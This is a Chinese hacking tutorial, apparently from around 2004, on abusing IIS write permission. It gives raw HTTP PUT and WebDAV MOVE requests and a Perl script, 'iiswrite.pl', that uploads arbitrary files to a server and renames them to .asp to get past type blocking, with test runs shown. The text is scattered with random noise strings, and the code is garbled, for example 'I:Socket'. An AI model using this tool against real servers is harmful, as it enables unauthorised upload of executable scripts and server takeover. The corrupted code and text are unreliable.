对iis写权限的利用

韩冰

作者：SuperHei 转自:http://www.4ngel.net

大家可能看过《远程分析IIS设置》，里面对iis的各种设置进行了分析，我这里就对iis的写权限来分析下，以下引用《远程分析IIS设置》文章对iis写权限分析内容：

写权限

- I- z8 n9 T, X9 P

　　测试一个目录对于web用户是否具有写权限，采用如下方法：telnet到服务器的web端口(80)并发送一个如下请求：

PUT /dir/my_file.txt HTTP/1.1 Host: iis-server - q' v; e K+ }1 y$ d5 z$ \, TContent-Length: 10

4 `. X! l( l# s- x

　　这时服务器会返回一个100( 继续)的信息：

3 M X8 N7 T, m$ R

HTTP/1.1 100 Continue Server: Microsoft-IIS/5.0 Date: Thu, 28 Feb 2002 15:56:00 GMT

　　接着，我们输入10个字母：

/ @6 @7 e( e4 \1 m6 q9 f4 Z

5 v9 G% ^; d6 P3 R6 w# v0 mAAAAAAAAAA

/ }5 F: L0 n4 F- y3 o

　　送出这个请求后，看服务器的返回信息，如果是一个 201 Created响应：

2 ?; |8 ]" `4 N. p0 J, Z0 r; tHTTP/1.1 201 Created Server: Microsoft-IIS/5.0 Date: Thu, 28 Feb 2002 15:56:08 GMT Location: http://iis-server/dir/my_file.txt 8 X# [3 z# A# |" b- V: u/ A+ wContent-Length: 0 Allow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, LOCK, UNLOCK

　　那么就说明这个目录的写权限是开着的，反之，如果返回的是一个403错误，那么写权限就是没有开起来，如果需要你认证，并且返回一个 401(权限禁止) 的响应的话，说明是开了写权限，但是匿名用户不允许。如果一个目录同时开了”写”和“脚本和可执行程序”的话，那么web用户就可以上传一个程序并且执行它，恐怖哦%^#$!~

/ X: K8 n ^7 y

　　这里简单说明下：

9 ?5 C& @. W& B- a& L

PUT /dir/my_file.txt HTTP/1.1 Host: iis-server Content-Length: 10

　　PUT：请求服务器将附件的实体储存在提供的请求URL处，如果该请求URL指向的资源已经存在，则附件实体应被看做是当前原始服务器上资源的修改版本。如果请求URL没有指向现存的资源，该URL将被该请求的用户代理定义成为一个新的资源，原始服务器将用该URL产生这个资源。 　　Host：是HTTP请求的发送地址 6 L! ^1 @1 A: T6 b9 H @　　Content-Length：是内容长度，也就是实体长度，该长度值和上传的文件大小一致

　　用nc（telnet）提交很烦琐，我们这里写个简单的perl程序，来完成这个复杂的提交过程，在写代码时我们用binmode()方式打开文件，代码如下：

#!/usr/bin/perl use I:Socket; $ARGC = @ARGV;

6 B* v \' @" L3 ^

if ($ARGC != 4) 7 Y: V. C A2 j K. y{ , i. b/ ? _6 s5 J7 U　　print "usage0 127.0.0.1 80 kaka.exe /Scripts/file.exe\n"; 4 L. `# ]% c% s8 B2 l　　exit; } $host = @ARGV[0]; ?/ t n1 \: Y/ z6 |- G- j- ]- T' f$port = @ARGV[1]; ! g a" q5 |% a* ~. b8 c2 N: E$file = @ARGV[2]; $ k3 L' }6 K& O9 p" |3 w$path = @ARGV[3];

; I" d; c" Z( C$ n0 z) E; ]% S5 p

@s=stat("$file"); $size = $s[7]; #得到文件大小 2 @) `4 _3 u) j/ Oprint "$file size is $size bytes\n";

. x! B0 @1 a* [, A0 ]

my $sock = I:Socket::INET->new(Proto =>"tcp", PeerAddr =>$host, 1 u* n" s8 j" VPeerPort =>$port) || die "Sorry! Could not connect to $host \n"; 4 s, N) v! M5 z: Eprint $sock "PUT $path HTTP/1.1\n"; 4 m; e, h& Q" I6 o- b' rprint $sock "Host: $host\n"; ' m1 a4 T" ~! _1 qprint $sock "Content-Length: $size\n\n"; #sock连接

open(FILE,"$file"); 0 |; M8 n9 H0 h7 Bbinmode(FILE); #用2进制打开文件

while (read(FILE,$char,1024)) { #读取文件数据上传 　　print $sock "$char"; / |- c1 K5 _& e9 Z0 Q) Z} print $sock "\n\n"; / V/ j4 [1 E: J3 c@req = <$sock>; . |9 m/ C" W, v4 m, y- dprint "please wait...\n"; # a- J$ }5 i. T' g' [$ J5 Wsleep(2); . s' `/ N+ G! }3 [4 H6 Fif ($req[4]=~/200|201/){ 4 X, A% b* V, L+ t% F　　print "upfile Succeed!!!" ; #成功显示 } else{ 0 }+ k5 j7 c9 r4 w/ a0 o9 W　　print "upfile faile!!!\n\n"; 4 H2 K5 W' f$ J J　　print @req;#如果失败显示返回错误 9 ^! t* w$ D: ]" B: O8 y} 1 ]$ I- U3 B% f: L$ c# nclose $sock; 9 m( ~7 t& Z! c. `8 ~1 q5 u0 w) _close FILE;

5 T$ Q, Q* L: e$ n2 @) E0 U

　　下面我们测试下：

C:\usr\bin>perl.exe iiswt.pl 127.0.0.1 80 kaka.txt /Scripts/kaka.txt 4 E- {, Z3 M1 }; W' }+ nkaka.txt size is 14 bytes M1 Z9 D6 N/ B9 lplease wait... upfile Succeed!!!

9 e4 s0 m; W9 X; ^

C:\Inetpub\Scripts>dir kaka.txt & w9 z9 U2 A" B/ g驱动器 C 中的卷没有标签。 % f8 G, ]5 X1 v. R* q. v6 i0 `) O卷的序列号是 3CD1-479E

: S# r/ s1 k& E. e8 _2 V

C:\Inetpub\Scripts 的目录

. R$ P9 ~1 o6 E! t; ?* g

2004-05-05 00:37 14 kaka.txt 1 个文件 14 字节 - O6 c! f: e0 l3 a0 T1 A0 个目录 3,871,080,448 可用字节

　　这里我们把kaka.txt成功上传到了web目录Scripts下，以为程序中用了binmode()方式（2进制）打开文件，应该可以上传其他文件，我们先测试下exe文件：

C:\usr\bin>perl.exe iiswt.pl 127.0.0.1 80 perl.exe /Scripts/perl.exe , p4 }: j) f, [9 Q7 c. Jperl.exe size is 20535 bytes 7 I$ Q5 Q8 T$ ?3 {3 u- p( S7 Uplease wait... # @% Y9 v/ I9 n7 z1 Tupfile Succeed!!!

C:\Inetpub\Scripts>dir perl.exe 驱动器 C 中的卷没有标签。 & q* Y; Z) O& ?, s. d: z卷的序列号是 3CD1-479E

^# y/ g( i0 c

C:\Inetpub\Scripts 的目录

2004-05-05 00:42 20,535 perl.exe 1 个文件 20,535 字节 0 个目录 3,871,031,296 可用字节

/ L. `- }( |/ E8 g. w. i0 C

　　成功，可以上传exe了，是不是可以上传任意文件呢？接着来测试asp文件：

0 \# X* k( G4 F6 ]( m% ^

C:\usr\bin>perl.exe iiswt.pl 127.0.0.1 80 kaka.asp /Scripts/kaka.asp - e+ U5 N1 @$ G& k2 \kaka.asp size is 4 bytes please wait... upfile faile!!!

HTTP/1.1 100 Continue Server: Microsoft-IIS/5.0 Date: Tue, 04 May 2004 16:45:51 GMT

HTTP/1.1 403 Forbidden Server: Microsoft-IIS/5.0 7 p+ N4 y) @% O: v8 P) @Date: Tue, 04 May 2004 16:45:51 GMT Connection: close Content-Type: text/html Content-Length: 44

<body><h2>HTTP/1.1 403 Forbidden</h2></body>

! s3 N4 X! K. S: {

　　失败！！提示HTTP/1.1 403 Forbidden错误，看来直接用post方式写asp不行了，经过测试只要是iis支持的文件类型都会产生HTTP/1.1 403 Forbidden错误。

" X& f; t) \# r) {) X) Q6 f' f

　　那我们怎样才可以上传iis支持的文件类型文件呢？iis除了可以执行put，post，get等动作外，还可以执行COPY, MOVE等命令，呵呵！我们这可以先把本地asp上传到远程主机web目录下的txt等其他文件，在提过copy，move命令来改为asp。

" \( Z5 o$ b7 g7 c3 o/ R9 H

　　我们还是先用nc提交测试下：

5 h5 o7 f) M1 |% {# D

D:\>nc 127.0.0.1 80 " T; [- l5 x3 k3 B# ]3 [MOVE /scripts/kaka.txt HTTP/1.1 ) d+ T' e3 v! w+ l# [, ^6 _* ~Host:127.0.0.1 Destination: http://127.0.0.1/scripts/kaka.asp

- @ G" n ~1 \$ S4 k, c, b) ^

HTTP/1.1 201 Created Server: Microsoft-IIS/5.0 2 b0 a, u! N- y- Y4 \: r0 oDate: Sun, 05 Oct 2003 09:30:59 GMT ) z: l1 [& q7 h/ KLocation: http://127.0.0.1/scripts/x.asp Content-Type: text/xml 2 @* `1 B) ]4 b/ }4 |8 |0 t) jContent-Length: 0

　　成功利用MOVE把/scripts/kaka.txt改名/scripts/kaka.asp。这样我们就可以结合put和move来完成通过iis写容易文件了。我们还是用perl来完成。

　　测试写asp成功：

& \& L! v! C$ V: V7 A; t+ L1 W7 r

C:\usr\bin>perl kaka.pl 127.0.0.1 80 kaka.asp /scripts/kaka.asp 4 ~5 F' W* S/ c4 o************************************************************ codz by ≯SuperHei<QQ:123230273> && lanker<QQ:18779569> ************************************************************ kaka.asp size is 4 bytes please wait... . ?* X; |2 y1 P/ O8 P! d; P: e/ uupfile Succeed!!! Modifyfile Succeed!!!

5 C/ ? B U6 e4 y9 n& z8 }

　　最终的iiswrite.pl代码如下（由于写本文时，在网吧对于文章中代码是先又本人打“草稿”，又lanker测试并最终完成，THX lanker。）：

9 m4 h9 g$ f& _' c4 c3 q 1 T8 I& q! ]- W- b7 g0 ~7 O

#!/usr/bin/perl + H7 y1 r5 f" [. C/ R1 b#The iiswrite Script

use I:Socket; $ARGC = @ARGV; print "*" x 60; print "\ncodz by ≯SuperHei<QQ:123230273> && lanker<QQ:18779569>\n"; print "*" x 60,"\n"; if ($ARGC != 4) { 　　print "usage0 127.0.0.1 80 kaka.txt /scripts/my_file.txt\n"; 　　exit; } $host = @ARGV[0]; $port = @ARGV[1]; 8 ^. |, s+ e$ x( [3 K+ k9 F9 j$path = @ARGV[3]; ( r+ M! E# H0 v: T$file = @ARGV[2];

- ~( K3 C, t" a9 k {7 z

@path=split("/",$path); # R) s0 ^5 i8 r, k) c$any = pop(@path); ; e5 g2 Q$ b# B; x8 G$path1=join("/",@path); " w, V. N) z8 Z@s=stat("$file"); $size = $s[7];

print "$file size is $size bytes\n"; ! Z" \* `1 `6 F6 umy $sock = I:Socket::INET->new(Proto =>"tcp", PeerAddr =>$host, # M ?* Q3 U0 L' Q- HPeerPort =>$port) || die "Sorry! Could not connect to $host \n"; print $sock "PUT $path1/lanker.txt HTTP/1.1\n"; print $sock "Host: $host\n"; 6 a) b- ~# O+ \+ V Rprint $sock "Content-Length: $size\n\n"; 6 \) ^( l5 v/ l: w* P0 Yopen(FILE,"$file")|| die "Can't open $file"; binmode(FILE); while (read(FILE,$char,1024)) { 3 C+ n8 z) A1 X2 r　　print $sock "$char"; } print $sock "\n\n"; @req = <$sock>; 9 A; [0 G# T# K' T! {print "please wait...\n"; 0 C5 v8 b6 k! v0 }+ ]* Bsleep(2); " h. }! ]. r- qif ($req[4]=~/200|201/){ 　　print "upfile Succeed!!!\n" ; 0 d: M- t T: x5 R0 Y6 D3 D} else{ 　　print "upfile faile!!!\n"; % ^5 @+ l+ O' @6 F, t/ [} # {- d% A6 {& E8 oclose $sock; % Y$ `& B6 |9 g" [: ?" q0 cclose FILE;

& B* e% v7 ?" ] b, E4 c* j a

my $sock = I:Socket::INET->new(Proto =>"tcp", PeerAddr =>$host, PeerPort =>$port) || die "Sorry! Could not connect to $host \n"; 3 _, [: v6 X9 i: C6 t5 I1 w9 Iprint $sock "MOVE $path1/lanker.txt HTTP/1.1\n"; / _& [. ?# f+ d% `print $sock "Host: $host\n"; print $sock "Destination:http://$hostport$path\n\n\n\n"; D: L4 c$ k4 C( P4 I@req = <$sock>; if ($req[0]=~/20\d+|/){ % T" o' m7 A! ?4 W8 W　　print "Modifyfile Succeed!!!" ; # Z1 Q, V( K1 P0 [) t0 @} $ P1 c6 x% [! J7 b( Zelse{ * ^5 x. E, ?/ z& Q: @+ m3 ?5 |　　print "upfile faile!!!"; & l4 i) B% U3 x: h5 A0 ]} close $sock